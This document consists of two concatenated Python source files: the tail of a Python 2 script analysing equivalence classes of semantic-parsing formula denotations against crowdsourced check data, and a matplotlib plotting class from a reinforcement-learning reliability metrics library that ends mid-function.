print '\t'.join(str(x) for x in fields)
sys.stdout.flush()
# Find out the splitters from 30 --> 300
def process3(ex_id, fin):
n, k, d, denotations, grid = read_denotation_file(ex_id, fin)
thirties = defaultdict(lambda: defaultdict(list))
counts = Counter()
for i, row in enumerate(grid):
row = tuple(row)
thirties[row[:31]][row].append(i)
counts[row[:31]] += 1
cores = []
splits = []
if counts:
first_thirty_one, count = counts.most_common(1)[0]
full = thirties[first_thirty_one]
# full = map from full denotation tuple to deriv indices
core = max(len(x) for x in full.values())
for indices in full.values():
if len(indices) == core:
cores.extend(indices)
else:
splits.extend(indices)
if not splits:
cores = []
else:
splits = sorted(splits)
fields = [ex_id, n, k, d, len(thirties), len(cores), len(splits),
' '.join(str(x) for x in cores[:30]),
' '.join(str(x) for x in splits[:30])]
print '\t'.join(str(x) for x in fields)
sys.stdout.flush()
# Find out more stuff about annotation
def process5(ex_id, fin, ann_fin, ret_data, size_path, formula_path):
n, k, d, denotations, grid = read_denotation_file(ex_id, fin)
grid = [row[:31] for row in grid]
# Equiv class to list of indices
equiv_classes = defaultdict(list)
for i, row in enumerate(grid):
equiv_classes[tuple(row)].append(i)
# Read annotation
annotations = []
for line in ann_fin:
annotations.append(clean(line[:-1]))
annotations = tuple(annotations[:31])
# Read size
if size_path:
with open(size_path) as fin:
sizes = [int(x) for x in fin]
else:
sizes = [0] * n
sizes_counter = Counter(sizes)
# Read formulas
if formula_path:
with (open if formula_path.endswith('.gz') else gzip.open)(formula_path) as fin:
formulas = fin.readlines()
else:
formulas = [''] * n
score, chosen_entropy = ret_data
chosen_random = range(len(chosen_entropy))
fields = [ex_id, n, k, d, len(equiv_classes),
'{:.3}'.format(score),
' '.join(str(x) for x in chosen_entropy),
' '.join('{}:{}'.format(u, sizes_counter[u])
for u in xrange(1, 9))]
if annotations[0] == 'null':
fields.append('no')
else:
fields.append('yes')
# Count the number of matches
matched = len(equiv_classes[annotations])
fields.append(matched)
# Chosen equiv classes based on chosen tables
def count_on_chosen(chosen):
chosen_annotations = tuple(annotations[x] for x in chosen)
num_classes_matched = 0
num_derivs_matched = []
derivs_matched = []
for key, value in equiv_classes.items():
chosen_key = tuple(key[x] for x in chosen)
if chosen_key == chosen_annotations:
num_classes_matched += 1
num_derivs_matched.append(len(value))
derivs_matched.extend(value)
fields.extend([num_classes_matched, sum(num_derivs_matched)])
fields.append(list(reversed(sorted(num_derivs_matched))))
derivs_matched.sort()
matched_sizes = [sizes[x] for x in derivs_matched]
matched_sizes_counter = Counter(matched_sizes)
fields.append(' '.join('{}:{}'.format(u, matched_sizes_counter[u])
for u in xrange(1, 9)))
# Is the formula with the lowest size the annotated one?
if matched_sizes:
min_size, min_index = min((u,i) for (u,i)
in zip(matched_sizes, derivs_matched))
fields.append([min_size, min_index, formulas[min_index]])
else:
fields.append('')
count_on_chosen(chosen_entropy)
count_on_chosen(chosen_random)
print '\t'.join(str(x) for x in fields)
sys.stdout.flush()
# Find out stuff about annotation; turked version
def process6(ex_id, fin, ann_fin, size_path, formula_path, exec_dir):
# These are only for computing equivalence classes
n, k, d, denotations, grid = read_denotation_file(ex_id, fin)
grid = [row[:31] for row in grid]
# Equiv class to list of indices
equiv_classes = defaultdict(list)
for i, row in enumerate(grid):
equiv_classes[tuple(row)].append(i)
deriv_to_rep = {}
for equiv_class in equiv_classes.values():
rep = min(equiv_class)
for x in equiv_class:
deriv_to_rep[x] = rep
# Read annotation
annotations = []
for line in ann_fin:
annotations.append(clean(line[:-1]))
annotations = tuple(annotations[:31])
# Read size
if size_path:
with open(size_path) as fin:
sizes = [int(x) for x in fin]
else:
sizes = [0] * n
sizes_counter = Counter(sizes)
# Read formulas
if formula_path:
with (open if formula_path.endswith('.gz') else gzip.open)(formula_path) as fin:
formulas = fin.readlines()
else:
formulas = [''] * n
fields = [ex_id, n, k, d, len(equiv_classes),
' '.join('{}:{}'.format(u, sizes_counter[u])
for u in xrange(1, 9))]
correct_class = None
if annotations[0] == 'null':
fields.append('no')
fields.append('')
else:
fields.append('yes')
# Count the number of matches
matched = len(equiv_classes[annotations])
fields.append(matched)
if matched > 0:
correct_class = min(equiv_classes[annotations])
fields.append(correct_class)
def get_flag(x):
if x == '(number 42)' or x == '(name Ao)':
return 'G'
elif x == '(number 13)' or x == '(name Ax)':
return 'F'
elif x == '(number 666)':
return 'B'
elif x == '(number 777)' or x == '(name Bo)':
return 'g'
elif x == '(number 999)' or x == '(name Bx)':
return 'f'
elif x == '(number 88)' or x == '(name X)':
return 'X'
else:
return None
# Read Turk data
if os.path.exists(os.path.join(exec_dir, 'denotations')):
prefix = ''
else:
prefix = 'actual-'
with gzip.open(os.path.join(exec_dir, prefix + 'denotations', 'nt-{}.gz'.format(ex_id))) as fin:
_, _, _, _, turk_grid = read_denotation_file(ex_id, fin)
with gzip.open(os.path.join(exec_dir, 'check-denotations', 'nt-{}.gz'.format(ex_id))) as fin:
_, _, _, _, check_grid = read_denotation_file(ex_id, fin)
check_grid = [[get_flag(x) for x in y] for y in check_grid]
with gzip.open(os.path.join(exec_dir, prefix + 'annotated-denotations', 'nt-{}.gz'.format(ex_id))) as fin:
anno_grid = [x[:-1] for x in fin]
with gzip.open(os.path.join(exec_dir, 'check-annotated-denotations', 'nt-{}.gz'.format(ex_id))) as fin:
check_anno_grid = [x[:-1] for x in fin]
check_anno_grid = [get_flag(x) for x in check_anno_grid]
# Used indices
if check_grid:
used_indices = [i for (i,x) in enumerate(check_grid[0]) if x is not None]
flags = [check_grid[0][i] for i in used_indices]
else:
used_indices = [i for (i,x) in enumerate(anno_grid) if x is not None]
flags = [check_anno_grid[i] for i in used_indices]
fields.append(used_indices)
fields.append(''.join([{'G': 'A', 'F': 'A', 'B': 'B',
'g': 'B', 'f': 'B', 'X': 'X', None: '?'}[x] for x in flags]))
fields.append(check_anno_grid[0])
# Scheme is a function that takes in a check vector (only for used indices)
# and return True (matched) or False (not matched).
#
# For each possible scheme, compute
# - number of classes matched
# - number of formulas matched
# - class sizes
# - whether the annotated formula matches turked data
# - whether the "correct" class is among the matched classes
def check_scheme(scheme):
hello = []
for check_vector in check_grid:
hello.append(scheme([check_vector[x] for x in used_indices]))
hello_anno = scheme([check_anno_grid[x] for x in used_indices])
# num classes matched
matched_derivs = [i for (i,x) in enumerate(hello) if x]
matched_classes = set(deriv_to_rep[x] for x in matched_derivs)
fields.append(len(matched_classes))
fields.append(len(matched_derivs))
class_sizes = [(len(equiv_classes[tuple(grid[x])]), x) for x in matched_classes]
#class_sizes.sort(key=lambda x: -x[0])
#fields.append([x[1] for x in class_sizes])
#fields.append([x[0] for x in class_sizes])
# manually annotated formula
fields.append(hello_anno)
# correct is among?
fields.append(correct_class in matched_classes)
def no_big_f(vector):
return all(x != 'F' for x in vector)
check_scheme(no_big_f)
def no_f_ever(vector):
return all((x != 'f' and x != 'F') for x in vector)
check_scheme(no_f_ever)
def at_most_one_big_f(vector):
return sum([x == 'F' for x in vector], 0) <= 1
check_scheme(at_most_one_big_f)
print '\t'.join(str(x) for x in fields)
sys.stdout.flush()
# Dump equivalence classes to a file
def process7(ex_id, fin, ann_fin, size_path, formula_path, exec_dir, outdir):
n, k, d, denotations, grid = read_denotation_file(ex_id, fin)
denotations_set = set(denotations)
#grid = [row[:31] for row in grid]
# Read annotation
annotations = []
for line in ann_fin:
annotations.append(clean(line[:-1]))
for x in set(annotations):
if x not in denotations_set and n > 0:
print >> sys.stderr, 'WTF:', ex_id, n, k, d, x
annotations = tuple(annotations)
print annotations
#annotations = annotations[:31]
# Read size
if size_path:
with open(size_path) as fin:
sizes = [int(x) for x in fin]
else:
sizes = [0] * n
sizes_counter = Counter(sizes)
# Read formulas
if formula_path:
with (open if formula_path.endswith('.gz') else gzip.open)(formula_path) as fin:
formulas = [x.strip() for x in fin.readlines()]
else:
formulas = [''] * n
fields = [ex_id, n, k, d]
if annotations[0] == 'null':
fields.append('no')
else:
fields.append('yes')
def get_flag(x):
if x == '(name Ao)':
return 'G'
elif x == '(name Ax)':
return 'F'
elif x == '(name Bo)':
return 'g'
elif x == '(name Bx)':
return 'f'
elif x == '(name X)':
return 'X'
else:
assert x is None or x == 'null'
return None
# Read Turk data
with gzip.open(os.path.join(exec_dir, 'actual-denotations', 'nt-{}.gz'.format(ex_id))) as fin:
_, _, _, _, turk_grid = read_denotation_file(ex_id, fin)
with gzip.open(os.path.join(exec_dir, 'check-denotations', 'nt-{}.gz'.format(ex_id))) as fin:
_, _, _, _, check_grid = read_denotation_file(ex_id, fin)
check_grid = [[get_flag(x) for x in y] for y in check_grid]
with gzip.open(os.path.join(exec_dir, 'actual-annotated-denotations', 'nt-{}.gz'.format(ex_id))) as fin:
anno_grid = [x[:-1] for x in fin]
with gzip.open(os.path.join(exec_dir, 'check-annotated-denotations', 'nt-{}.gz'.format(ex_id))) as fin:
check_anno_grid = [x[:-1] for x in fin]
check_anno_grid = [get_flag(x) for x in check_anno_grid]
# Dump equivalence classes
# Also dump whether the class
# - Matches the annotated formula
# - Matches the turked data
deno_tuple_to_indices = defaultdict(list)
for i, row in enumerate(grid):
row = tuple(row)
deno_tuple_to_indices[row].append(i)
classes = []
flag_counts_classes = [0, 0, 0, 0]
flag_counts_formulas = [0, 0, 0, 0]
for deno_tuple, indices in deno_tuple_to_indices.iteritems():
real = all(x != 'F' for x in check_grid[indices[0]])
ideal = (deno_tuple == annotations)
classes.append([real, ideal, indices])
flag_counts_classes[real * 2 + ideal] += 1
flag_counts_formulas[real * 2 + ideal] += len(indices)
classes.sort(key=lambda x: (-x[0]-x[1], -x[0], -len(x[2])))
fields.append(len(classes))
fields.extend(flag_counts_classes)
fields.extend(flag_counts_formulas)
with open(os.path.join(outdir, 'nt-' + str(ex_id)), 'w') as fout:
print >> fout, '{} classes ({} formulas) {{'.format(len(classes), n)
for i, (real, ideal, indices) in enumerate(classes):
equiv_class = [(sizes[i], formulas[i]) for i in indices]
equiv_class.sort(key=lambda x: x[1])
print >> fout, ' CLASS {} ({} formulas){}{} {{'.format(
i, len(equiv_class), '[IDEAL]' if ideal else '',
'[TURK]' if real else '')
for s, f in equiv_class:
print >> fout, ' ', s, f
print >> fout, ' }'
print >> fout, '}'
print '\t'.join(str(x) for x in fields)
sys.stdout.flush()
# Dump matching formulas to a file
def process8(ex_id, fin, formula_path, exec_dir, outdir):
# Actually fin is not needed ...
n, k, d = [int(x) for x in fin.readline().split()]
fields = [ex_id, n, k, d]
def get_flag(x):
if x == '(name Ao)':
return 'G'
elif x == '(name Ax)':
return 'F'
elif x == '(name Bo)':
return 'g'
elif x == '(name Bx)':
return 'f'
elif x == '(name X)':
return 'X'
else:
assert x is None or x == 'null'
return None
# Read Turk data
with gzip.open(os.path.join(exec_dir, 'check-denotations', 'nt-{}.gz'.format(ex_id))) as fin:
_, _, _, _, check_grid = read_denotation_file(ex_id, fin)
check_grid = [[get_flag(x) for x in y] for y in check_grid]
if n > 0:
used_indices = [i for (i,x) in enumerate(check_grid[0]) if x is not None]
flags = [check_grid[0][i] for i in used_indices]
else:
used_indices = []
flags = []
fields.append(''.join([{'G': 'A', 'F': 'A', 'B': 'B',
'g': 'B', 'f': 'B', 'X': 'X', None: '?'}[x] for x in flags]))
# Get the "correct" derivations
corrects = []
cur_i = 0
with gzip.open(formula_path) as fin:
for line in fin:
line = line.strip()
if line.startswith('(derivation (formula'):
if all(check_grid[cur_i][i] != 'F' for i in used_indices):
corrects.append(line)
cur_i += 1
fields.append(len(corrects))
# Dump matching formulas
with gzip.open(os.path.join(outdir, 'nt-{}.gz'.format(ex_id)), 'w') as fout:
for correct in corrects:
print >> fout, correct
print '\t'.join(str(x) for x in fields)
sys.stdout.flush()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--step', type=int, default=1)
parser.add_argument('-a', '--annotation-dir',
help='directory to search for dumped annotated formula denotations')
parser.add_argument('-r', '--retained-tables',
help='path to retained-tables file')
parser.add_argument('-z', '--sizes-dir',
help='path to sizes directory')
parser.add_argument('-f', '--formulas-dir',
help='path to formulas directory')
parser.add_argument('-e', '--exec-dir',
help='path to exec dir with denotations, annotated-denotations, check-*')
parser.add_argument('-R', '--range', nargs=2, type=int,
help='range of example ids')
parser.add_argument('denotation_dir',
help='directory to search for dumped denotations')
parser.add_argument('-o', '--outdir',
help='output directory')
args = parser.parse_args()
# Read denotation directories
ex_id_to_path = {}
directory = args.denotation_dir
for filename in os.listdir(directory):
match = re.match(r'nt-(\d+)\.gz', filename)
assert match, filename
ex_id_to_path[int(match.group(1))] = os.path.join(directory, filename)
print >> sys.stderr, 'There are', len(ex_id_to_path), 'denotation files'
ex_id_to_ann_path = {}
if args.annotation_dir:
directory = args.annotation_dir
for filename in os.listdir(directory):
match = re.match(r'nt-(\d+)\.gz', filename)
assert match, filename
ex_id_to_ann_path[int(match.group(1))] = os.path.join(directory, filename)
print >> sys.stderr, 'There are', len(ex_id_to_ann_path), 'annotated denotation files'
ex_id_to_size_path = {}
if args.sizes_dir:
directory = args.sizes_dir
for filename in os.listdir(directory):
match = re.match(r'nt-(\d+)', filename)
assert match, filename
ex_id_to_size_path[int(match.group(1))] = os.path.join(directory, filename)
print >> sys.stderr, 'There are', len(ex_id_to_size_path), 'annotated sizes files'
ex_id_to_formula_path = {}
if args.formulas_dir:
directory = args.formulas_dir
for filename in os.listdir(directory):
match = re.match(r'nt-(\d+)(\.gz)?', filename)
assert match, filename
ex_id_to_formula_path[int(match.group(1))] = os.path.join(directory, filename)
print >> sys.stderr, 'There are', len(ex_id_to_formula_path), 'annotated formulas files'
if args.retained_tables:
ret_data = {}
with open(args.retained_tables) as fin:
for line in fin:
line = line[:-1].split('\t')
ex_id = int(line[0][3:])
score = float(line[1])
chosen = [int(x) for x in line[2].split()]
ret_data[ex_id] = (score, chosen)
print >> sys.stderr, 'STEP:', args.step
for i, ex_id in enumerate(sorted(ex_id_to_path)):
if i % 20 == 0:
print >> sys.stderr, 'Processing', i
if args.range and not (args.range[0] <= i <= args.range[1]):
continue
with gzip.open(ex_id_to_path[ex_id]) as fin:
if args.step == 1:
process1(i, fin)
elif args.step == 2:
process2(i, fin)
elif args.step == 3:
process3(i, fin)
elif args.step == 5:
with gzip.open(ex_id_to_ann_path[ex_id]) as ann_fin:
process5(i, fin, ann_fin, ret_data[ex_id],
ex_id_to_size_path.get(i),
ex_id_to_formula_path.get(i))
elif args.step == 6:
with gzip.open(ex_id_to_ann_path[ex_id]) as ann_fin:
process6(i, fin, ann_fin,
ex_id_to_size_path.get(i),
ex_id_to_formula_path.get(i),
args.exec_dir)
elif args.step == 7:
assert args.outdir
if not os.path.exists(args.outdir):
os.makedirs(args.outdir)
with gzip.open(ex_id_to_ann_path[ex_id]) as ann_fin:
process7(i, fin, ann_fin,
ex_id_to_size_path.get(i),
ex_id_to_formula_path.get(i),
args.exec_dir, args.outdir)
elif args.step == 8:
assert args.outdir
if not os.path.exists(args.outdir):
os.makedirs(args.outdir)
process8(i, fin,
ex_id_to_formula_path.get(i),
args.exec_dir, args.outdir)
print >> sys.stderr, 'DONE!'
if __name__ == '__main__':
main()
|
rl_reliability_metrics/analysis/plotter.py | mcx/rl-reliability-metrics | 122 | 12686781 | # coding=utf-8
# Copyright 2019 The Authors of RL Reliability Metrics.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class for making plots of robustness metric results and statistics."""
import datetime
import math
import os
from absl import logging
from matplotlib import pyplot as plt
import numpy as np
from rl_reliability_metrics.analysis import io_utils_oss as io_utils
from rl_reliability_metrics.analysis import plot_utils
from rl_reliability_metrics.analysis import stats
from rl_reliability_metrics.analysis import stats_utils
# Internal gfile dependencies
HATCH_PATTERNS = ('-', '/', '.', 'O', '+', 'o', 'x', '*', '\\')
ALGO_COLORS = ('r', 'y', 'g', 'b', 'm')
MARKERS = ('o', 's', 'v', '^', '<', '>')
TIMEFRAME_NAMES = ['Beginning', 'Middle', 'End']
UP_ARROW = r' $\uparrow$'
DOWN_ARROW = r' $\downarrow$'
class Plotter(object):
"""Class for making plots of metric results and statistics."""
def __init__(self,
data,
pvals_dir,
confidence_intervals_dir,
n_timeframes,
algorithms=None,
out_dir=None,
pthresh=0.01,
multiple_comparisons_method='benjamini-yekutieli',
subplot_axis_labels=True,
make_legend=False):
"""Initialize Plotter object.
Args:
data: DataDef object containing all the metric results.
pvals_dir: Path to directory containing p-values for comparisons between
pairs of algorithms.
confidence_intervals_dir: Path to directory containing bootstrap
confidence intervals.
n_timeframes: Total number of timeframes we are dividing each run into.
algorithms: If specified, these algorithms will be plotted, in this order.
If None, we plot all algorithms available in the data (order not
guaranteed).
out_dir: Path to directory where we save the plot images. If None, we
simply display the images without saving.
pthresh: p-value threshold for significance.
multiple_comparisons_method: String indicating method to use for multiple
comparisons correction. See self._do_multiple_comparisons_correction for
options.
subplot_axis_labels: Whether to add x- and y-axis labels for each subplot.
make_legend: Whether to make a legend.
"""
self.data_def = data
self.pvals_dir = pvals_dir
self.confidence_intervals_dir = confidence_intervals_dir
self.n_timeframes = n_timeframes
self.out_dir = out_dir
self.pthresh = pthresh
self.multiple_comparisons_method = multiple_comparisons_method
self.subplot_axis_labels = subplot_axis_labels
self.make_legend = make_legend
# Parse information from data_def
self.dataset = self.data_def.dataset
self.algorithms = algorithms if algorithms else self.data_def.algorithms
self.n_algo = len(self.algorithms)
self.n_task = len(self.data_def.tasks)
# Bonferroni-corrected p-value threshold
self.pthresh_corrected = stats_utils.multiple_comparisons_correction(
self.n_algo, self.pthresh, self.multiple_comparisons_method)
def make_plots(self, metric):
"""Make all plots for a given metric.
Args:
metric: String name of the metric.
"""
plot_utils.paper_figure_configs()
# Create a metric-specific StatsRunner object
stats_runner = stats.StatsRunner(self.data_def, metric, self.n_timeframes)
result_dims = stats_runner.result_dims
if result_dims == 'ATRP':
# Within-runs metric with eval points.
self._make_plots_with_eval_points(metric, stats_runner)
elif result_dims == 'ATR':
# Within-runs metrics without eval points (one value per run).
self._make_plots_no_eval_points(metric, stats_runner)
elif result_dims == 'ATP':
# Across-runs metric with eval points
self._make_plots_with_eval_points(metric, stats_runner)
else:
raise ValueError('plotting not implemented for result_dims: %s' %
result_dims)
def _save_fig(self, metric, plot_name):
timestamp = datetime.datetime.now().strftime('%Y%m%d_%H%M%S_%f')
filepath = os.path.join(self.out_dir,
'%s__%s__%s.png' % (metric, plot_name, timestamp))
io_utils.makedirs(os.path.dirname(filepath))
with open(filepath, 'wb') as f:
plt.savefig(f)
logging.info('Plot output to: %s', filepath)
def _make_plots_with_eval_points(self, metric, stats_runner):
"""Make plots for a metric evaluated at multiple evaluation points per run.
e.g. 'ATP' or 'ATRP' metrics.
Plot 1: raw metric values per task.
* One subplot per task.
* Each subplot contains a plot showing the metric values across evaluation
points. For ATRP metrics, we show the median metric values and fill plots
indicating the IQR at each evaluation point.
Plot 2: Mean rankings across tasks.
* One subplot per timeframe.
* One bar plot showing the mean ranking for each algorithm, and horizontal
line segments indicating which pairs of algorithms are statistically
different.
Args:
metric: String specifying the metric.
stats_runner: StatsRunner object
"""
# Set up figure for per-task raw values.
subplot_ncol_1 = 4
n_subplots_1 = self.n_task + 1 if self.make_legend else self.n_task
subplot_nrow_1 = math.ceil(n_subplots_1 / subplot_ncol_1)
fig1 = plt.figure(figsize=(4 * subplot_ncol_1, 4 * subplot_nrow_1))
# Set up figure for mean rankings.
subplot_ncol_2 = self.n_timeframes
if self.make_legend:
subplot_ncol_2 += 1
subplot_nrow_2 = 1
fig2 = plt.figure(figsize=(4 * subplot_ncol_2, 4 * subplot_nrow_2))
##=== Plot 1: Raw metric values per task ===##
plt.figure(fig1.number)
eval_point_idxs = stats_runner.get_timeframe_points(None)
eval_point_values = self.data_def.metric_params[metric]['eval_points']
metric_results = stats_runner.load_metric_results(
self.algorithms, eval_point_idxs, collapse_on_timepoints=False)
result_dims = stats_runner.result_dims
for i_task in range(self.n_task):
plt.subplot(subplot_nrow_1, subplot_ncol_1, i_task + 1)
task_results = np.squeeze(metric_results[:, i_task])
if len(eval_point_idxs) == 1:
task_results = np.expand_dims(task_results, -1)
if result_dims == 'ATP':
# For across-run metrics, we plot a single curve.
for i_algo in range(self.n_algo):
plt.plot(eval_point_values, task_results[i_algo, :],
marker=MARKERS[i_algo])
if self.subplot_axis_labels:
plt.xlabel('evaluation points', fontsize=16)
plt.ylabel('metric values', fontsize=16)
elif result_dims == 'ATRP':
# For per-run metrics, we plot the median and IQR across curves.
for i_algo in range(self.n_algo):
algo_color = ALGO_COLORS[i_algo]
task_algo_results = task_results[i_algo] # n_runs x n_eval_points
result_medians = np.median(task_algo_results, axis=0)
result_quartile1 = np.percentile(task_algo_results, q=25, axis=0)
result_quartile3 = np.percentile(task_algo_results, q=75, axis=0)
plt.plot(eval_point_values, result_medians, algo_color,
marker=MARKERS[i_algo])
plt.fill_between(
eval_point_values,
result_quartile1,
result_quartile3,
alpha=0.3,
color=algo_color)
if self.subplot_axis_labels:
plt.xlabel('evaluation points', fontsize=16)
plt.ylabel('metric values', fontsize=16)
else:
raise ValueError('result_dims must be ATP or ATRP, not %s' %
result_dims)
plot_utils.simple_axis(plt.gca())
plt.title(self.data_def.tasks[i_task])
# plot the legend
if self.make_legend:
plt.subplot(subplot_nrow_1, subplot_ncol_1, n_subplots_1)
self._lineplot_legend()
##=== Plot 2: Mean rankings (mean across tasks) ===##
for timeframe in range(self.n_timeframes):
# Load data for plotting.
timeframe_points = stats_runner.get_timeframe_points(timeframe)
pvals = self._load_pvals(metric, timeframe)
confidence_intervals = self._load_confidence_intervals(
metric, stats_runner, timeframe)
plt.figure(fig2.number)
metric_results = stats_runner.load_metric_results(
self.algorithms, timeframe_points, collapse_on_timepoints=True)
plt.subplot(subplot_nrow_2, subplot_ncol_2, timeframe + 1)
self._plot_bars_and_significant_differences(metric_results, pvals,
confidence_intervals,
stats_runner)
plt.title(TIMEFRAME_NAMES[timeframe], fontsize=14)
# plot the legend
if self.make_legend:
plt.subplot(subplot_nrow_2, subplot_ncol_2, subplot_ncol_2)
self._barplot_legend()
##=== Wrap up the figures ===##
for fig, plot_name in [(fig1, 'per-task_raw'), (fig2, 'mean_rankings')]:
if plot_name == 'per-task_raw':
suptitle_suffix = (
UP_ARROW if stats_runner.bigger_is_better else DOWN_ARROW)
else:
suptitle_suffix = ''
plt.figure(fig.number, plot_name)
self._wrap_up_figure(metric, plot_name, suptitle_suffix)
def _make_plots_no_eval_points(self, metric, stats_runner):
"""Make plots for a metric without evaluation points (one value per run).
e.g. 'ATR' metrics.
Plot 1: Raw metric values per task.
* One subplot per task.
* Each subplot contains a box-and-whisker plot showing the median metric
values for each algorithm, a box indicating 1st and 3rd quartiles, and
whiskers indicating the minimum and maximum values (excluding outliers,
defined as being outside 1.5x the inter-quartile range from the 1st and 3rd
quartiles).
Plot 2: Mean rankings across tasks.
* One bar plot showing the mean ranking for each algorithm, and horizontal
line segments indicating which pairs of algorithms are statistically
different.
Args:
metric: String specifying the metric.
stats_runner: StatsRunner object
"""
# Load data for plotting.
metric_results = stats_runner.load_metric_results(
self.algorithms, timeframe_points=None)
pvals = self._load_pvals(metric)
confidence_intervals = self._load_confidence_intervals(metric, stats_runner)
##=== Plot 1: Raw metric values per task ===##
# Set up figure.
subplot_ncol = 4
n_subplot = self.n_task
if self.make_legend:
n_subplot += 1
subplot_nrow = math.ceil(n_subplot / subplot_ncol)
plt.figure(figsize=(4 * subplot_ncol, 4 * subplot_nrow))
# Plot the raw metric values as box-and-whisker plots.
for i_task in range(self.n_task):
plt.subplot(subplot_nrow, subplot_ncol, i_task + 1)
task_results = np.squeeze(metric_results[:, i_task, :])
boxplot = plt.boxplot(task_results.T, patch_artist=True)
for part in ['boxes', 'whiskers', 'fliers', 'means', 'medians', 'caps']:
plt.setp(boxplot[part], color='k')
for i_patch, patch in enumerate(boxplot['boxes']):
patch.set(facecolor=ALGO_COLORS[i_patch])
plt.title(self.data_def.tasks[i_task], fontsize=16)
self._configure_axes('Raw metric values')
self._extend_ylims_past_zero(task_results)
plot_utils.simple_axis(plt.gca())
if self.make_legend:
plt.subplot(subplot_nrow, subplot_ncol, n_subplot)
self._barplot_legend()
# Wrap up the figure.
suptitle_suffix = (
UP_ARROW if stats_runner.bigger_is_better else DOWN_ARROW)
self._wrap_up_figure(
metric, plot_name='per-task_raw', suptitle_suffix=suptitle_suffix)
##=== Plot 2: Mean rankings (mean across tasks) ===##
# Set up figure.
subplot_ncol = 2 if self.make_legend else 1
subplot_nrow = 1
plt.figure(figsize=(4 * subplot_ncol, 4 * subplot_nrow))
# Plot mean rankings and show statistical differences
plt.subplot(subplot_nrow, subplot_ncol, 1)
self._plot_bars_and_significant_differences(metric_results, pvals,
confidence_intervals,
stats_runner)
plot_utils.simple_axis(plt.gca())
# plot the legend
if self.make_legend:
plt.subplot(subplot_nrow, subplot_ncol, subplot_ncol)
self._barplot_legend()
# Wrap up the figure.
self._wrap_up_figure(metric, plot_name='mean_rankings')
def _wrap_up_figure(self, metric, plot_name, suptitle_suffix=''):
"""Add suptitle, set tight layout, and save the figure."""
plt.suptitle(
plot_utils.METRICS_DISPLAY_NAMES[metric] + suptitle_suffix, fontsize=14)
plt.tight_layout(rect=[0, 0.03, 1, 0.95])
if self.out_dir:
self._save_fig(metric, plot_name)
def _load_pvals(self, metric, timeframe=None):
"""Load previously computed p-values.
Args:
metric: Which metric we are plotting.
timeframe: Which timeframe we are plotting. Set None if irrelevant (for
metrics that are not evaluated at specific eval points).
Returns:
Dictionary of p-values, with entries {'algo1.algo2': pval}
"""
pvals = {}
for algo1 in self.algorithms:
for algo2 in self.algorithms:
# Get path to p-value
pvals_filepath = ('%s/%s_%s_%s' %
(self.pvals_dir, metric, algo1, algo2))
if timeframe is not None:
pvals_filepath += '_%d' % timeframe
# Load the p-value
with open(pvals_filepath, 'r') as f:
pval = float(f.readline())
pvals['%s.%s' % (algo1, algo2)] = pval
logging.info('P-values loaded:')
logging.info(pvals)
return pvals
def _load_confidence_intervals(self, metric, stats_runner, timeframe=None):
"""Load previously computed confidence intervals.
Args:
metric: Which metric we are plotting.
stats_runner: StatsRunner object
timeframe: Which timeframe we are plotting. Set None if irrelevant (for
metrics that are not evaluated at specific eval points).
Returns:
Dictionary of confidence intervals, with entries
{'algo': [ci_lower, ci_upper]}
"""
cis = {}
for algo in self.algorithms:
# Get path to confidence intervals
ci_filepath = '%s/%s_%s' % (self.confidence_intervals_dir, metric, algo)
if timeframe is not None:
ci_filepath += '_%d' % timeframe
# Load the p-value
with open(ci_filepath, 'r') as f:
line = f.readline()
ci = list(map(float, line.split(',')))
# Normalize to range (1, n_metrics)
if 'R' in stats_runner.result_dims:
ci[0] /= self.data_def.n_runs_per_experiment
ci[1] /= self.data_def.n_runs_per_experiment
cis[algo] = ci
logging.info('Confidence intervals loaded:')
logging.info(cis)
return cis
def _plot_bars_and_significant_differences(self, metric_results, pvals,
confidence_intervals,
stats_runner):
"""For a single timeframe, plot mean rank and show significant differences.
Args:
metric_results: Numpy array with metric values. First two dimensions
should be (n_algorithm, n_task)
pvals: p-values on comparison between each pair of algorithms. A dict with
entries {'algo1.algo2': pvalue}.
confidence_intervals: Confidence intervals on mean rank for each
algorithm. A dict with entries {'algo': [ci_lower, ci_upper]}.
stats_runner: StatsRunner object
"""
ymax = 1.32 * (len(self.algorithms))
y_pval_lines = 0.83
# First get the rankings across all algos
metric_ranks = stats_runner.rank_per_task(metric_results)
# Get mean ranks over tasks, for each algo
# (collapse across all other dimensions)
extra_dims = range(1, len(metric_ranks.shape))
mean_ranks = np.mean(metric_ranks, tuple(extra_dims))
# Normalize the ranks to range (1, n_algorithms)
if 'R' in stats_runner.result_dims:
mean_ranks /= self.data_def.n_runs_per_experiment
# Plot the mean rankings and error bars for each algo
for i_algo, algo in enumerate(self.algorithms):
plot_utils.flipped_errorbar(
x=i_algo,
y=mean_ranks[i_algo],
yerr=confidence_intervals[algo],
ymax=self.n_algo,
bar_color=ALGO_COLORS[i_algo],
hatch_pattern=HATCH_PATTERNS[i_algo],
x_offset=0.6,
)
# Rank order the p-values.
if self.multiple_comparisons_method != 'bonferroni':
# Get subset of the p-values: we don't need the reverse comparisons, and
# we don't need the self comparisons.
pvals_subset = {}
for i_algo, algo1 in enumerate(self.algorithms):
for j_algo in range(i_algo + 1, self.n_algo):
algo2 = self.algorithms[j_algo]
algo_str = '%s.%s' % (algo1, algo2)
pvals_subset[algo_str] = pvals[algo_str]
sorted_keys = sorted(pvals_subset, key=pvals_subset.get)
pval_ranks = {key: rank for rank, key in enumerate(sorted_keys)}
# Plot black bars indicating significant differences.
n_lines_plotted = 0
for i_algo, algo1 in enumerate(self.algorithms):
for j_algo in range(i_algo + 1, self.n_algo):
algo2 = self.algorithms[j_algo]
algo_pair_str = '%s.%s' % (algo1, algo2)
if self.multiple_comparisons_method != 'bonferroni':
pval_rank = pval_ranks[algo_pair_str]
pthresh_corrected = self.pthresh_corrected[pval_rank]
else:
pthresh_corrected = self.pthresh_corrected
if pvals[algo_pair_str] < pthresh_corrected:
x = [i_algo + 1, j_algo + 1]
y = [(y_pval_lines + n_lines_plotted * 0.03) * ymax] * 2
plt.plot(x, y, color='k')
n_lines_plotted += 1
self._configure_axes('normalized mean rank', range(1, self.n_algo + 1),
range(self.n_algo, 0, -1))
def _configure_axes(self, y_label, y_ticks=None, y_tick_labels=None):
"""Configure axis limits and labels."""
